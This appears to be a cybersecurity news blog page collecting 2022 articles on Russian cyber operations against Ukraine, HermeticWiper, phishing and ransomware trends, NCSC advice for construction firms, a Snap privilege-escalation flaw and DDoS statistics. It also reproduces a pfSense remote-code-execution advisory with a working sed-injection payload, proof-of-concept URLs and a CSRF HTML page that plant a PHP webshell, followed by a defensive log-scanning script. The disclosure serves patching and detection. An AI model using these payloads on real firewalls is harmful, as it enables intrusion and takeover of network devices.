Monday, January 20, 2025

Russia, Ukraine and the Danger of a Global Cyberwar


A conversation with Marcus Willett, former director of cyber at GCHQ

On the morning of February 22, 2022, the world woke to the news that Russia had moved troops into two separatist regions of eastern Ukraine. At the time of writing, it is not yet a full invasion of Ukraine, but Russia did conduct attacks on February 24, hitting cities with airstrikes and artillery in what was called a “special military operation” by Russian President Vladimir Putin.

Just before this maneuver, SecurityWeek spoke to Marcus Willett to get insight into the role of cyber in aggressive geopolitics. Willett is senior advisor for cyber at the International Institute for Strategic Studies where he researches the use of cyber and related technologies as levers of national power. Before then, he had worked at the UK’s GCHQ for 33 years, including roles such as the agency’s first director of cyber.

The background

Strategically, Ukraine is the soft underbelly of Russia. As an ally, Ukraine is a bulwark against NATO. As a member of NATO, it would be a Russian weakness. Preventing this weakness, and keeping NATO at least an arm’s length from the heart of Russia, is one purpose of Russian behavior.

But it shouldn’t be ignored that Russia has been increasingly bellicose over the last two decades – including, for example, the invasion of Georgia in 2008 and the almost uncontested annexation of Crimea in 2014. The extent of Putin’s desire to return Russia to the height of its global influence as the USSR should not be ignored.

The big difference between the Russia of the USSR and the Russia of today has been the emergence of cyber as an accepted theater of war. It is this role of cyber that SecurityWeek discussed with Marcus Willett.

Cyber softening

Russia has been waging its own cyberwar against Ukraine for many years. For example, on December 23, 2015, Russian attackers accessed SCADA systems in three Ukrainian electricity distribution companies, opened breakers in about 30 substations in Kiev and western Ivano-Frankivsk, and caused a loss of power to more than 200,000 customers. On December 17, 2016, a single transmission substation in northern Kiev lost power.

In June 2017, Russian actors hijacked the updater process of Ukrainian accounting software firm MEDoc and delivered a wiper malware named NotPetya to MEDoc customers. Its worm capabilities subsequently led to the wiper very rapidly spreading around the world. There are many other examples of disruptive Russian cyber operations against Ukraine between 2014 and the present.

Since the beginning of 2022, however, it seems that Russian cyber activity against Ukraine has increased. This includes evidence that wiper malware has again disrupted some Ukrainian government networks, and attacks from the FSB-linked Gamaredon have targeted around 5,000 entities, including critical infrastructure and government departments. So far, however, there has not been the same scale of disruption as occurred in 2015, 2016 and 2017.

Danger of a Global Cyberwar

The purpose of such cyber activity is to weaken critical infrastructure, damage government’s ability to respond to any aggression, and to demoralize the population. The advantage of conducting the initial stages of kinetic activity in cyber is the inherent perceived impossibility of accurately attributing the action to any specific aggressor. Noticeably, Putin has consistently denied any Russian (government) involvement in any of this activity.

“What is unknown,” Willett told SecurityWeek, “is the extent to which Russian actors are now embedded undetected within the Ukrainian critical infrastructure – and particularly the electricity grid. This would be the classic use of cyber operations to prepare the battlefield for physical invasion. In the past, cyber activity preceded the physical action in Georgia and Crimea by around two weeks – but Russia may be able to move faster this time.”

There is, however, a major difference between the Crimea and Ukraine incidents. The West seemed largely unprepared on how to respond over Crimea. This time, America has learned the lesson and has been controlling the narrative from the beginning. The U.S. and NATO have signaled very clearly that they know what Russia is doing and how the allies will respond. The U.S. has liaised closely with its European allies, and sanctions have already begun. Blocking Russian gas exports to Europe will hurt Russia’s economy, while withholding tech exports could also hurt Russian industry. The message is very clear: a physical war with Ukraine could lead to a sanctions war with America and Europe – and that is one war that the relative economic minnow cannot win.

Widespread cyberwar and attribution

The U.S. has been warning the rest of the world against a potential widening scope of Russian cyber activity, and that cyber defenses generally should be tightened. 

“Part of the worry,” said Willett, “is that cyberattacks against Ukraine might bleed over, like NotPetya, to affect other countries and cause wider damage unintentionally. There is some concern that the Russians may intentionally do stuff more widely, but that would probably be in retaliation for something that the U.S. or NATO might do. 

“I suspect,” he continued, “the Russians will be bending over backwards to make sure that they don’t let their cyber operations against Ukraine spread like NotPetya and cause damage more widely, including in the U.S. and its NATO allies. But we may see an increase in Russian criminal gangs using ransomware against the U.S. and its allies. If any of the Russian government agencies got attributed for causing major damage in the U.S. and NATO, the consequences for Russia would be very serious. Nevertheless, we might well see an increase in Russian cybercriminal activity, including the use of ransomware against the U.S. and its allies.”

This raises the whole question of ‘attribution’. The received belief is it is impossible to do accurate cyber attribution. “That is absolutely wrong,” said Willett. “The problem with attributing in the past has not been a lack of confidence in knowledge, it’s been an inability to release the information in a way that doesn’t jeopardize sources. But over the years, states have become more confident in what they are able to reveal safely, have acknowledged there are thresholds where the risk is acceptable, and the private sector has become more capable in putting together the cyber jigsaw to come up with an accurate conclusion.”

This has allowed the U.S. to be sufficiently confident to indict not just countries but named individuals in both China and Russia. The attacking governments can deny this and claim the U.S. justice system is corrupt, but the effect of being attributed collectively by multiple allied states who say, ‘we know it was you’ is damaging to international reputation. “It would be a mistake for any one nation to think it could attack another without being known,” said Willett.

The danger of accidental global cyberwar

But accidents happen. The two iconic cyberweapons have been Stuxnet and NotPetya. It is assumed that the U.S. developed Stuxnet (although this has never been admitted). NotPetya has been confidently attributed to the Russian government. Both malwares escaped from their assumed targets into the wider world. This was probably accidental – but similar accidents could lead to wider implications during a period of global geopolitical tension.

“The U.S., UK and other like-minded states have declared their intent to use their cyber power responsibly, without giving many indications as to what precisely this means. Comparing Stuxnet and NotPetya is one way of illustrating the difference,” said Willett. 

NotPetya was an uncontrolled worm released through a global IT vulnerability that – surprise, surprise – spread beyond the intended target and affected the operating system of any system it landed on. “Stuxnet,” continued Willett, “was very targeted. Yes, it spread beyond the intended target, but it could only cause damage if the specific software that made a centrifuge spin was present (with lots of other conditions). The controlled Stuxnet and the uncontrolled NotPetya illustrate the difference between responsible and irresponsible use of cyber power.”

Willett believes that the U.S. will do its utmost to maintain the principle of a responsible use of cyber power. “If not,” he said, “they end up playing the same game as the Russians, the Chinese, Iran and North Korea. This would leave much of the rest of the world thinking that what the Russians and others have been demanding – new international treaties and conventions to increase the control by governments of their sovereign piece of cyberspace – is the only solution.” The problem is that this is code, in authoritarian states, for mass internal censorship and surveillance, and is the opposite of the ‘free internet’ that we would like to see endure. “So, there are strategic reasons for any U.S. or NATO cyber operations to be very carefully judged to maintain cyber responsibility rather than simply to respond like-for-like.” 

In the other direction, Willett doesn’t believe the Russian state will be tempted to run destructive cyber operations against the U.S. and its allies. “They might,” he added, “if subsequent sanctions are particularly brutal; but that would be a mistake – it would be another ‘internationally wrongful act’ under international law, and would invite even more stringent countermeasures and even more international opprobrium.” 

In the end, you can’t help feeling that there’s a longer game here: both sides are struggling to understand the potential of cyber in war. Can cyber capabilities be used to have a deterrent effect, can they prepare the battlefield, could they be used for countermeasures against an aggressor? “These have largely been intellectual and doctrinal discussions to this point, but might now be tested in reality with unpredictable results. We are at a very dangerous moment. We should perhaps remember that, before the current Ukraine crisis, Biden said that it would most likely be as the consequence of a cyber breach that the U.S. would find itself in a real shooting war with a major power.”

Nevertheless, the overriding impression given by Marcus Willett is that both sides (this excludes any action or opportunity taken by China, Iran or North Korea) will do everything possible to avoid the actuality of a Russia/Ukraine cyberwar spreading to the wider world. But ‘unintended consequences’ is a risk in all IT and security – and unintended consequences are hard to predict or control.

Latest

As this article was completed, the physical invasion of Ukraine began. On the morning of February 24, 2022, Russian troops invaded Ukraine. This was accompanied by a further increase in cyber activity.

Associated Press reported another wave of DDoS attacks against Ukraine’s parliament and other government and banking websites, while ESET has detected new wiper malware on “hundreds of machines in the country”.

Although ESET did not name the targets beyond saying they were ‘large organizations’, Symantec has described three: a financial institution in Ukraine, and government contractors in Latvia and Lithuania. This adds a further geopolitical complication — although Ukraine itself is not a member of NATO, both Latvia and Lithuania are members.

One thing is clear: the marriage of cyber and kinetic warfare has been consummated.

Note: Anything not quoted from Marcus Willett is the opinion of the author.


Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Destructive HermeticWiper Malware Targets Computers in Ukraine


Just as Russia was preparing to launch an invasion of Ukraine, Ukrainian government websites were disrupted by DDoS attacks and cybersecurity firms reported seeing what appeared to be a new piece of malware on hundreds of devices in the country.

The new malware, dubbed “HermeticWiper” by the cybersecurity community, is designed to erase infected Windows devices. The name references a digital certificate used to sign a malware sample — the certificate was issued to a Cyprus-based company called Hermetica Digital.

“At this time, we haven’t seen any legitimate files signed with this certificate. It’s possible that the attackers used a shell company or appropriated a defunct company to issue this digital certificate,” explained endpoint security firm SentinelOne, whose researchers have been analyzing the new malware.

The malware has also been analyzed by researchers at ESET and Symantec. Each of the companies has shared indicators of compromise (IoCs) associated with HermeticWiper.

ESET first spotted HermeticWiper on Wednesday afternoon (Ukraine time) and the company said hundreds of computers in Ukraine had been compromised.

ESET noted that the malware samples it observed were compiled in late December 2021, which suggests the attack might have been in the works for nearly two months.

Research conducted by the cybersecurity firm suggests that at least in one case the malware may have been delivered after attackers took control of a victim’s Active Directory server.

The wiper abuses legitimate drivers associated with an application called EaseUS Partition Master. It attempts to corrupt the master boot record (MBR) of every physical drive, as well as every partition on these drives.

This is the second destructive malware attack aimed at Ukraine in 2022. In January, threat actors defaced Ukrainian government websites and unleashed wiper malware named WhisperGate, which had been disguised as ransomware.

While the cybersecurity companies analyzing HermeticWiper have not attributed the malware to any known threat group — given the current situation — the most likely culprit is Russia. In the case of the wiper malware used in the January attacks, Ukraine said it had evidence that Russia was responsible.


Microsoft, Apple and Google top the list of the most spoofed brands in 2021


IBM’s 2022 X-Force Threat Intelligence Index also revealed that ransomware was again the top attack type last year and that manufacturing supply chains were most vulnerable to exploitation

Microsoft, Apple and Google were the top three brands criminals attempted to mimic in 2021, according to IBM’s newly released X-Force Threat Intelligence Index. The industry-leading brands were used repeatedly in phishing kits, with attackers likely seeking to capitalize on their popularity and consumers’ trust, the Index said.

Cybercriminals used the brands as a disguise to steal consumers’ information or infect their devices with malware. Of the phishing kits that X-Force analyzed, an overwhelming number targeted email/ID/password combination, while scammers and cybercriminals attempted to gain access to credit card data in the majority of instances, the Index said.

The other brands that made the list were BMO Harris Bank, Chase, Amazon, Dropbox, DHL, CNN, Hotmail and Facebook, IBM said.

Ransomware, phishing remain top techniques

While ransomware was the number one attack observed by X-Force last year, attacks declined slightly to 21% from 23% the previous year. REvil ransomware actors were responsible for 37% of all attacks, the report said.

Another finding was that ransomware gangs had an average lifespan of 17 months before rebranding or disbanding. REvil, one of the most successful gangs, shut down in October 2021 after 31 months, the Index said.

Meanwhile, 41% of attacks were the result of phishing for initial access, which emerged as the top pathway to compromise in 2021, the Index said.

Other key highlights from the 2022 Index include:

  • Hitting consumers’ wallets–Ransomware attacks dominated manufacturing in 2021, contributing to marked-up product/services prices and burdening consumers already dealing with inflation at a near 40-year high. For example, by the end of 2021, ground beef prices rose 10% following the JBS ransomware attack and gas prices increased 10% following the Colonial Pipeline ransomware attack.
  • A Rising “debt” of vulnerabilities–With a record number of disclosed vulnerabilities in 2021, X-Force saw a 33% rise year over year in the number of network compromises caused by vulnerability exploitation, revealing businesses’ biggest vice: patching. Businesses in Europe, Asia and the Middle East and Africa were virtually overpowered by unpatched vulnerabilities, which caused about 50% of attacks in these regions in 2021.
  • “Manu-fractured” supply chains–Manufacturing was the most attacked industry in 2021, accounting for nearly one in four attacks with ransomware persisting as the main culprit. Nearly half of attacks on manufacturing were caused by vulnerabilities.
  • Early warning signs of cyber crisis in the cloud–With a 146% increase in new Linux ransomware code and a Docker-focused push expanding beyond just bots, it’s becoming easier for threat actors to utilize cloud environments for malicious purposes.

How brands and consumers can fight back

The fact that manufacturing has replaced financial services/insurance as the most targeted industry for attacks was a notable finding, said Charles DeBeck, senior cyber threat intelligence analyst at IBM Security X-Force.

“It’s only now at a time when the manufacturing industry is at a tipping point that cybercriminals predominantly shifted their sights to this sector, seeking to push it over the edge,” DeBeck said. “That tells us that attackers are wagering on the real-world repercussions an attack on these organizations would have–not only are they betting on the victim’s fear of financial/business loss … but they bet on supply chains’ reliance on these organizations, adding even more pressure on victims to pay.”

He added that a manufacturer loses money every second its operations are down, making the industry “a particularly juicy target for ransomware actors.”

One takeaway is that successful brands will continue to find themselves in the spotlight, and that will inevitably draw cybercriminals’ attention, DeBeck said. “We saw some of the most trusted tech brands amongst the companies scammers most commonly impersonated,” because they’re betting on the familiarity and positive experience that consumers have with them. That leads consumers to let their guards down and be more likely to click on a malicious URL.

“Consumers need to scrutinize links more and be more skeptical about emails and texts they receive, because the person or brand on the other end may not be who they think it is,” he advised.

Today’s digital acceleration, combined with the adversarial trends Security X-Force is seeing become more common, makes it clear that where businesses keep their data matters, DeBeck added.

“Businesses need to become more intentional about what data remains on-premises and which migrates to cloud environments,” he said. “Because with modernization, when the right data is placed in the right environment, the business can have better control, oversight and security over its workloads, including who has access to it and why.”


Hackers are targeting this ‘easy target’. Here’s how to protect yourself


Guidance from the NCSC urges small businesses in construction to boost their cybersecurity as hackers see a tempting target.

Construction firms are being offered tailored advice on how to protect themselves from cyber attacks and other online threats in new guidance from the National Cyber Security Centre (NCSC),  the cybersecurity arm of intelligence agency GCHQ.

The new ‘cyber security for construction businesses‘ guide is designed to provide practical advice to organisations in the construction industry on how to protect businesses and building projects from cyber threats.

The report warns that the construction industry faces threats from cyber criminals, ransomware gangs, malicious insiders and nation-state hacking operations.

“Recent high profile cyber attacks against the construction industry illustrate how businesses of all sizes are being targeted by criminals,” NCSC said.

Construction businesses are seen by cyber criminals as an “easy target”, the guide said, as many have high cash-flows, while the extensive use of sub-contractors and suppliers involving large numbers of high value payments makes construction businesses an attractive target for spear phishing.

“As construction firms adopt more digital ways of working, it’s vital they put protective measures in place to stay safe online – in the same way you’d wear a hard hat on site,” said Sarah Lyons, NCSC director for economy and society resilience.

“By following the recommended steps, businesses can significantly reduce their chances of falling victim to a cyber attack and build strong foundations for their overall resilience,” she added.

The guidance offered includes advice on securing office equipment from malware and other cyber attacks, including that IT equipment is kept up to date with the latest security patches, ensuring that only approved apps are downloaded and that there are controls around how USB sticks and other removable media are used, as well as controls around how IT equipment can be accessed by third parties and suppliers.

Other guidance includes avoiding the use of predictable passwords, changing default passwords, using multi-factor authentication across all important accounts and other techniques which can help businesses avoid falling victim to phishing emails and other cyber attacks.

Organisations should also make plans around incident response, including regularly updating offline backups and establishing plans on how they would deal with different cyber attacks, should they face them.

The NCSC suggests that construction firms can do this using their free ‘Exercise in a Box’ product, which provides businesses with a means of testing their resilience and preparedness based on real cyber threat scenarios.

The guidance is designed to be easy-to-understand in order to provide the construction, building suppliers and related industries with information that can protect them from the most common cyber attacks. Senior members of the industry, as well as IT departments are urged to take the opportunity to examine how they can improve their cybersecurity defences to help avoid becoming a victim.

“The consequences of poor cyber security should not be underestimated. They can have a devastating impact on financial margins, the construction programme, business reputation, supply chain relationships, the built asset itself and, worst of all, people’s health and well-being. As such, managing data and digital communications channels is more important than ever,” said Caroline Gumble, Chief Executive of the Chartered Institute of Building (CIOB).

“This guide provides a timely opportunity to focus on the risks presented by cybercrime,” she added.


Remote Code Execution in pfSense <= 2.5.2


(RCE) Remote Code Execution in pfSense

Summary

pfSense allows authenticated users to get information about the routes set in the firewall. The information is retrieved by executing the netstat utility, and its output is then parsed via the sed utility. While the common prevention patterns for command injection (i.e. the usage of the escapeshellarg function for the arguments) are in use, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. This vulnerability could also be exploited pre-authentication, as the vulnerable endpoint is also vulnerable to a Cross-Site Request Forgery (CSRF).

Product Description (from vendor)

pfSense® Plus software is the world’s most trusted firewall. The software has garnered the respect and adoration of users worldwide – installed well over three million times. Made possible by open source technology. Made into a robust, reliable, dependable product by Netgate.

CVE(s)

Details

Root Cause Analysis

To show the routes set in the firewall, pfSense executes the sed utility with some user-controllable input.
sed, a stream editor, is a powerful utility for text transformations. It has many commands, and several of them can be given in a single command-line argument, separated by semicolons. The ability to add multiple commands in one argument is the key to this vulnerability.

What is important to specify before diving into the exploitation details is that pfSense is based on FreeBSD, so all the GNU-specific arguments of sed (e.g. the e/exec argument which could be used to run a system command) are not available.

An excerpt of the vulnerable code follows:

    35  if (isset($_REQUEST['isAjax'])) {
    36      require_once('auth_check.inc');
    37
    38      $netstat = "/usr/bin/netstat -rW";
    39      if (isset($_REQUEST['IPv6'])) {
    40          $netstat .= " -f inet6";
    41          echo "IPv6\n";
    42      } else {
    43          $netstat .= " -f inet";
    44          echo "IPv4\n";
    45
    46      }
    47      if (!isset($_REQUEST['resolve'])) {
    48          $netstat .= " -n";
    49      }
    50
    51      if (!empty($_REQUEST['filter'])) {
    52          $netstat .= " | /usr/bin/sed -e " . escapeshellarg("1,3d; 5,\$ { /" . htmlspecialchars($_REQUEST['filter']) . "/!d; };");
    53      } else {
    54          $netstat .= " | /usr/bin/sed -e '1,3d'";
    55      }
    56
    57      if (is_numeric($_REQUEST['limit']) && $_REQUEST['limit'] > 0) {
    58          $_REQUEST['limit']++;  // Account for the header line
    59          $netstat .= " | /usr/bin/head -n {$_REQUEST['limit']}";
    60      }
    61
    62      echo htmlspecialchars_decode(shell_exec($netstat));
    63
    64      exit;
    65  }

At lines 51-52 it can be seen that if the request contains a filter parameter, its HTML special characters are converted to their HTML entities. The input is then prefixed and suffixed with some hard-coded sed syntax, and finally everything is escaped by the escapeshellarg function, which prevents sub-commands or other arguments from being injected. At line 62 the command is finally executed.

As mentioned before, it is possible to inject arbitrary sed syntax, with the only limitation being that the input is encoded via the htmlspecialchars function. This makes it possible to use the s/match/replace/ command to replace part of the netstat output with an arbitrary string, and the w /path/to/file command to write the output of the sed command to an arbitrary location.

Wrapping everything together, an attacker could set the filter parameter to the following string:

    .*/!d;};s/Destination/\x3c\x3fphp+system($_GET[\x22a\x22])\x3b\x3f\x3e/;w+/usr/local/www/a.php%0a%23

which will result in the following command being run:

    /usr/bin/netstat -rW -f inet | /usr/bin/sed -e '1,3d; 5,\$ { /!d;};s/Destination/\x3c\x3fphp system($_GET[\x22a\x22])\x3b\x3f\x3e/;w /usr/local/www/a.php
    #/!d; };'

As the netstat utility always outputs the Destination string, it was chosen to be replaced with <?php system($_GET["a"]);?> and then the output is written to /usr/local/www/a.php.

Proof of Concept

  1. Login to pfSense
  2. Visit the following URL by replacing <target> with the IP address / domain of the target pfSense instance: http://<target>/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+system($_GET[\x22a\x22])\x3b\x3f\x3e/;w+/usr/local/www/a.php%0a%23
  3. Visit the following URL by replacing <target> with the IP address / domain of the target pfSense instance and notice that the id command has been executed: http://<target>/a.php?a=id

Impact

An authenticated attacker could write an arbitrary file to the pfSense disk. This can be abused to write a webshell to execute arbitrary code / commands.

It should be noted that due to a lack of Cross-Site Request Forgery (CSRF) protections for the vulnerable endpoint it is possible for an attacker to trick an authenticated admin into visiting a malicious website to exploit the vulnerability through the victim’s session/browser. More details are available in the Cross-Site Request Forgery advisory.

A proof of concept to exploit the vulnerability through the CSRF follows:

  1. Login to pfSense
  2. Create an HTML file with the following content by replacing <target> with the IP address / domain of the target pfSense instance:

         <meta name="referrer" content="no-referrer">
         <script>
         window.location = "http://<target>/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3cscript\\x3eif\\x28location.pathname\\x21\\x3d\\x27\\x2fa.php\\x27\\x29\\x7blocation\\x3d\\x27\\x2fa.php\\x3fa\\x3did\\x27\\x7d\\x3c\\x2fscript\\x3e\\x3c\\x3fphp+system($_GET[\\x22a\\x22])\\x3b\\x3f\\x3e/;w+/usr/local/www/a.php%0a%23"
         </script>

  3. Visit the following URL by replacing <target> with the IP address / domain of the target pfSense instance and notice the 404 error: http://<target>/a.php?a=id
  4. Host the HTML page created at step 2 on a webserver and visit it in the same browser used for the other steps
  5. Notice that the Arbitrary File Write has been exploited to create a webshell in /usr/local/www/a.php and the victim is redirected to the webshell (http://<target>/a.php?a=id) to execute the id command

Remediation

Upgrade pfSense CE to version 2.6.0 or pfSense Plus to version 22.01.
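For instances that were exposed before the upgrade, the request pattern described above can be hunted for in web server access logs. The following is an added example, not part of the advisory: it assumes combined-format access log lines, the sample lines are constructed, and the marker set is a heuristic chosen for this sketch.

```python
import re
from urllib.parse import unquote_plus

# Combined log format: ip ident user [time] "METHOD target PROTO" status bytes "referer" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

# The filter is meant to be a pattern matched against route lines. These
# markers are sed syntax that ends the pattern and starts further commands
# (heuristics chosen for this example, not an exhaustive list).
MARKERS = {
    "newline": re.compile(r"[\r\n]"),
    "command_separator": re.compile(r";"),
    "sed_write_command": re.compile(r"(?:^|[;}/\n])\s*w\s+/"),
    "webroot_path": re.compile(r"/usr/local/www"),
}

def query_values(query, name):
    """Decoded values of one query parameter; split on '&' only so ';' stays in the value."""
    values = []
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if unquote_plus(key) == name:
            values.append(unquote_plus(raw))
    return values

def scan(lines):
    """Return one finding per diag_routes.php request whose filter carries sed syntax."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        if not match:
            continue
        path, _, query = match["target"].partition("?")
        if path.rsplit("/", 1)[-1] != "diag_routes.php":
            continue
        for value in query_values(query, "filter"):
            reasons = [name for name, rx in MARKERS.items() if rx.search(value)]
            if not reasons:
                continue
            # The CSRF variant suppresses the Referer header, so its absence
            # is recorded as a corroborating signal, never as a trigger.
            if match["referer"] in ("", "-"):
                reasons.append("no_referer")
            findings.append({
                "line": number,
                "ip": match["ip"],
                "time": match["ts"],
                "status": int(match["status"]),
                "reasons": reasons,
            })
    return findings

# Constructed sample lines (documentation addresses, placeholder replacement text).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Feb/2022:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [20/Feb/2022:10:00:09 +0000] "GET /diag_routes.php?isAjax=1&filter=192.168 HTTP/1.1" 200 512 "https://fw.example/diag_routes.php" "Mozilla/5.0"',
    '192.0.2.10 - - [20/Feb/2022:10:03:44 +0000] "GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/MARKER/;w+/usr/local/www/a.php%0a%23 HTTP/1.1" 200 97 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [20/Feb/2022:10:05:12 +0000] "GET /diag_routes.php?isAjax=1&filter=%5E10%5C.0%5C. HTTP/1.1" 200 300 "https://fw.example/diag_routes.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit is a reason to review /usr/local/www for files that are not part of the installed release, not proof of compromise on its own.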

Disclosure Timeline

Credits

  • Abdel Adim `smaury` Oisfi of Shielder


Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.


Snap Privilege Escalation: Vulnerability in Linux Package Manager Snap


A newly discovered Snap flaw allows a low-privileged user to gain root access.

Researchers found an easy-to-exploit vulnerability in Snap, a universal application packaging and distribution system developed for Ubuntu but available on multiple Linux distributions. The flaw allows a low-privileged user to execute malicious code as root, the highest administrative account on Linux.

Snap privilege escalation

The vulnerability, tracked as CVE-2021-44731, is part of a series of flaws that researchers from security firm Qualys found in various Linux components while investigating the security of Snap. This latest one and a separate issue tracked as CVE-2021-44730 are both in snap-confine, the tool responsible for setting up Snap application sandboxes.

What is Snap?

Snap is a package manager for Linux systems that was developed by Canonical, the company behind the popular Ubuntu desktop and server distribution. It allows the packaging and distribution of self-contained applications called “snaps” that run inside a restricted container, providing a configurable level of security.

By being self-contained, Snap applications don’t have external dependencies, which allows them to work cross-platform or cross-distribution. Traditionally, each major Linux distribution maintains its own pre-packaged software repository and software manager. Debian has DEB, Ubuntu has PPA, Fedora and Red Hat have RPM, Arch Linux has Pacman, and so on. All these systems pull in the desired package along with all other dependencies as separate packages. Snaps, on the other hand, come bundled with all the needed dependencies, making them universally deployable on all Linux systems that have the Snap service.

Snap ships by default on Ubuntu and several Linux distributions and is available as an option in many others, including the major ones. It’s used to distribute not only desktop applications, but also cloud and IoT ones.

Snap confinement — the isolation feature — has three levels of security with the Strict mode being used by most applications. In this mode, applications need to request permission to access files, other processes, or the network. This is not unlike the application sandboxing and permissions model from mobile operating systems like Android.

Since application sandboxing is one of the core features of Snap, any privilege escalation vulnerability that allows escaping that isolation and taking control of the host system is considered very serious.

Privilege escalation flaws

The Qualys researchers have dubbed their two snap-confine vulnerabilities as “Oh Snap! More Lemmings” because they follow another privilege escalation flaw discovered in Snap in 2019 and dubbed Dirty Sock. Since Dirty Sock, Snap has seen a thorough security audit by the SUSE security team and in general is programmed very defensively, making use of many kernel security features such as AppArmor profiles, seccomp filters and mount namespaces.

“We almost abandoned our audit after a few days,” the Qualys researchers said in their advisory, adding that “discovering and exploiting a vulnerability in snap-confine has been extremely challenging (especially in a default installation of Ubuntu).”

Nevertheless, the team spotted a few minor bugs and decided to push on. This resulted in the discovery of two privilege escalation vulnerabilities: CVE-2021-44730, a hardlink attack that’s only exploitable in non-default configurations, namely when the kernel’s fs.protected_hardlinks is 0; and CVE-2021-44731, a race condition that is exploitable in default installations of Ubuntu Desktop and near-default installations of Ubuntu Server.

“This race condition opens up a world of possibilities: Inside the snap’s mount namespace (which we can enter through snap-confine itself), we can bind-mount a world-writable, non-sticky directory onto /tmp, or we can bind-mount any other part of the filesystem onto /tmp,” the Qualys researchers said. “We can reliably win this race condition, by monitoring /tmp/snap.lxd with inotify, by pinning our exploit and snap-confine to the same CPU with sched_setaffinity(), and by lowering snap-confine’s scheduling priority with setpriority() and sched_setscheduler().”

In the process of investigating these flaws, the Qualys researchers have also discovered bugs in other related libraries and components that Snap uses: unauthorized unmounts in util-linux’s libmount (CVE-2021-3996 and CVE-2021-3995); an unexpected return value from glibc’s realpath() (CVE-2021-3998); an off-by-one buffer overflow/underflow in glibc’s getcwd() (CVE-2021-3999); and uncontrolled recursion in systemd’s systemd-tmpfiles (CVE-2021-3997). These flaws were patched in those respective components earlier this year.

Ubuntu has released patches for CVE-2021-44731 and CVE-2021-44730 for most of its supported Linux editions, except for 16.04 ESM (Extended Security Maintenance) which is still awaiting a fix. Both vulnerabilities are rated as high severity.


Q4/21: Sees More DDoS Attacks Than Ever Before


DDoS attacks hit a sad all-time high in the last quarter of 2021. According to Kaspersky telemetry, the number of attacks in Q4 increased by 52% against the previous quarter and more than 4.5 times against the same period last year. The numbers look scary, but rather than rushing to conclusions, it is better to work out why they are so high.

Kaspersky experts see the reasons, among other things, in the Christmas sales season and the increasing popularity of cryptocurrencies.

Extremely high number of DDoS attacks

In a DDoS attack, cybercriminals send a large number of requests to the targeted web resource with the aim of restricting its service or temporarily paralyzing it. The attacks can last for several days and lead to massive disruptions in companies.

From October to the end of December 2021, Kaspersky researchers observed a massive increase in DDoS attacks, recording a record high in the entire history of the international cybersecurity company’s observation of this type of threat. The Kaspersky experts see a combination of several factors here: the last three months of a year are usually the most frequently affected by DDoS attacks, online trade peaks due to sales around the holidays, and the exam season for students begins. Cybercriminals use this for their purposes, which leads to increased DDoS attacks.

Furthermore, Kaspersky experts saw an inverse proportionality between DDoS attacks and the cryptocurrency market. This is due to the fact that the capacities for organizing DDoS and mining cryptocurrencies are interchangeable – botnet owners tend to divert energy to mining when cryptocurrency is rising and to DDoS when it is falling.

Most DDoS attacks took place in the United States (43.55 percent), China (9.96 percent), Hong Kong (8.80 percent), Germany (4.85 percent) and France (3.75 percent). In Germany, DDoS attacks increased by 4 percent in Q2021 25 compared to the previous quarter, in Austria by 86 percent and in Switzerland by 48 percent.

“The DDoS threat landscape is constantly changing, reflecting current economic and societal trends,” comments Alexander Gutnikov, Security Expert at Kaspersky. “We expected an increase in DDoS attacks in the fourth quarter due to the selling season, but the unstable situation in the cryptocurrency market has pushed the DDoS landscape to a whole other level with an all-time high in the number of attacks. Based on the trends of the past few years, the first quarter of 2022 should not show a significant decrease in DDoS attacks. We therefore strongly advise implementing professional solutions to protect companies from DDoS attacks.”

Tips from Kaspersky for businesses to protect against DDoS attacks

  • Keep web resources running by employing specialists who know how to respond to DDoS attacks.
  • Regularly validate agreements with third parties and contact information, including those with and from internet service providers. This helps teams quickly access agreements in the event of an attack.
  • Implement a professional solution like Kaspersky DDoS Protection to protect against DDoS attacks.
  • Comprehensive knowledge of your own data traffic is essential. The use of network and application monitoring tools can help to identify trends and tendencies in data traffic. By understanding an organization’s typical traffic patterns and characteristics, a baseline can be established to help identify unusual activity that may indicate a DDoS attack.
  • Have a restrictive plan B ready for defense. This allows organizations to quickly restore business-critical services in the event of a DDoS attack.

Conclusion

On the one hand, Q4 met our expectations for this period; on the other, it surprised us. For example, instead of the expected increase in DDoS activity during major online sales, we saw a botnet lull. A feature of the quarter was the large number of very short DDoS attacks, as well as a slew of media reports about short but powerful attacks.

Now for our forecasts. Going by previous years’ trends, we expect Q1 2022 to produce roughly the same indicators as Q4 2021. But the situation in the world and, in particular, the cryptocurrency market is too volatile to make such a confident prediction. The bitcoin price has fallen to half its peak value, but remains high. It suffered a similar collapse in the middle of last year, but after that grew even stronger. If cryptocurrencies shoot up again, we could see a significant drop in the DDoS attack market, but if they sink even further, we will probably see an increase. It is impossible to predict which way it will go. But despite the lack of concrete information, we see no preconditions for any major fluctuations, and expect figures similar to those in Q4.


There is a shell in your lunch-box


